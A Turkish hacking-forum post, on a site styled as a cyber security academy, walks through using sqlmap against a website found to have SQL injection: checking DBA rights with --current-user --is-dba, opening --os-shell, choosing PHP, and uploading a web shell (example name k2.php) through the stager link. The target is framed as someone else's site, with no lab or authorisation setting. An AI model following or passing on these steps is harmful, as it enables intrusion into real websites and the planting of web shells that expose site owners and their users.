Siber Güvenlik Dünyasına Hoşgeldiniz

Ulusal Siber Güvenlik Akademisi olarak sizlere bu alanda siber güvenlik & ethical hacking eğitimi , günümüz siber saldırılarında kullanılan araç ve teknikleri kullanarak, siber güvenlik konusunda sizlere saldırı ve savunma yönünden eğitimler ile sizlerin çözümler üretebileceğiniz bir siber dünya sunuyoruz .

  • Ulusal Siber Güvenlik Akademisi olarak sizlere bu alanda siber güvenlik & ethical hacking eğitimi , günümüz siber saldırılarında kullanılan araç ve teknikleri kullanarak, siber güvenlik konusunda sizlere saldırı ve savunma yönünden eğitimler ile sizlerin çözümler üretebileceğiniz bir siber dünya sunuyoruz .

SQLMAP İLE SHELL BASMAK .

BlackEdition

NEFER
NEFER
Onursal Ünvan
Katılım
1 Haz 2018
Mesajlar
33
Beğeniler
1
Yaş
34
#1
İlk başta bir sql açıklı site bulduk ve bu açıklı sitemize shell sokmak istiyoruz.Öncelikle sitemizde bir sqlmap sorgusu yapıyoruz ancak farklı parametreleri kullanarak bu işlemi gerçekleştiriyoruz.


Bu sefer --dbs komutu yerine, --current-user --is-dba komutunu kullanacağız.Örnek ile gösterecek olursak;

Normalde bu kodu kullanıyorduk;

sqlmap -u "
You do not have permission to view link Giriş yap veya üye ol.
" --dbs

Bu sefer bu kod yerine aşağıdaki kodu kullanacağız;

Kullanacağımız Kodumuz:

sqlmap -u "
You do not have permission to view link Giriş yap veya üye ol.
" --current-user --is-dba

komutu ile başlatabiliriz. Biraz bekledikten sonra eğer aşağıdaki gibi bir kod görürseniz;


Kodumuz:

--> current user is DBA : True <--


Demektir ki shell sokmaya çok yakınsınız.Buradan sonra artık işler daha da kolaylaşmaya başlıyor;

Kodumuz:

sqlmap -u "
You do not have permission to view link Giriş yap veya üye ol.
" --os-shell

Bu kodu yazdıktan ve sonrasında enterladıktan sonra sitenin yazılmış olduğu dili soruyor.;




Ana sayfasına ulaştık yani sayfa php dili ile yazılmış.Sqlmap size şöyle
seçenekler verir;

(Sqlmap'e benzemesi açıdan bu işaretleri koydum.)

|1|ASP
|2|PHP
|3|ASPX
|4|JSP

Bu durumda sitemizin dilini yani php'yi seçmemiz gerekiyor.Hedef sitemiz "php" diliyle yazılmış çünkü.

Enterladıktan sonra karşımıza info yani bilgi veren bir kısım gelmesi lazım,o infoların arasında bir link olacak.


İnfo da bir link verilmiştir eğer gördüyseniz.Linke gidiyoruz ve karşımıza "shell" upload edilebilen bir yer geliyor.


Artık shellimizi upload edebiliriz.Upload ettikten sonra linkte .php yada .asp yada .aspx den önceki yazan yazıyı silip shellin adını yazıp

enter tuşuna basmamız yeterlidir Örnek olarak;


Sitemizin adresi:
You do not have permission to view link Giriş yap veya üye ol.


Buraya upload ediyoruz mesela, shellimizin adı k2.php olsun


Sitemizin adresi:
You do not have permission to view link Giriş yap veya üye ol.